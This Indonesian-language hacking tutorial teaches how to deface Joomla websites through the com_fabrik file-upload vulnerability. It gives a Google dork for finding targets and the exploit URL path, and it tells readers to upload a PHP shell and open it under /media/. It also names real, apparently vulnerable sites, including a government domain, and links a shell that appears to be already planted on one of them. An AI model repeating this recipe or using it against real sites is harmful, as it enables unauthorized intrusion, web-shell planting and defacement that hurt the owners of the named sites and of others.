Com_fabrik Upload Vulnerability

chmood
Malam ini, saya akan mengajarkan cara untuk deface website menggunakan Joomla com_fabrik Upload Vulnerability. Metode Serangan pemahaman Com_fabrik komponen Joomla memberikan Anda kekuatan untuk menciptakan bentuk-bentuk dan tabel yang berjalan di dalam Joomla tanpa memerlukan pengetahuan mySQL dan PHP. Kemudian makan data Anda ke dalam Google Maps, Charts atau AJAX berdasarkan calendar.But itu rentan :)


Menemukan Sasaran Rentan Mari kita memulainya
Dork:
inurl:? Index.php option = com_fabrik
atau index.php option = com_fabrik?




Eksploitasi : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

1.Paste yang salah dork di www.google.com.

Jika Anda ingin mempersempit pencarian untuk domain .com atau domain .com.au kemudian hanya menambahkan "site: com.au" di atas google dork.

Contoh: inurl:

index.php option = com_fabrik situs:? Com.au

(ini akan serach untuk kerentanan com_fabrik untuk website .com.au) Pemanfaatan Sasaran 1. Setelah Anda memiliki daftar situs, pilih situs web apapun dan mengganti menempatkan mengeksploitasi di belakang situs. Contoh:

Dari http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85 Untuk


http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


2. Kemudian, Anda akan mendapatkan sesuatu seperti ini.




3. Sekarang upload file untuk meng-upload seperti picture.jpg atau shell.php

Setelah file Anda berhasil upload , Anda perlu menambahkan /media/yourfilename.jpg untuk melihat file Anda . contoh :
http://www.scb.travel/media/blackcyberseccrew.jpg

4. Contoh dari situs rentan ,

http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1 http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0 5. Anda juga dapat meng-upload shell Anda ke situs :)

http://bluejaylodgecostarica.com/media/up.php dan deface index.html contoh : ini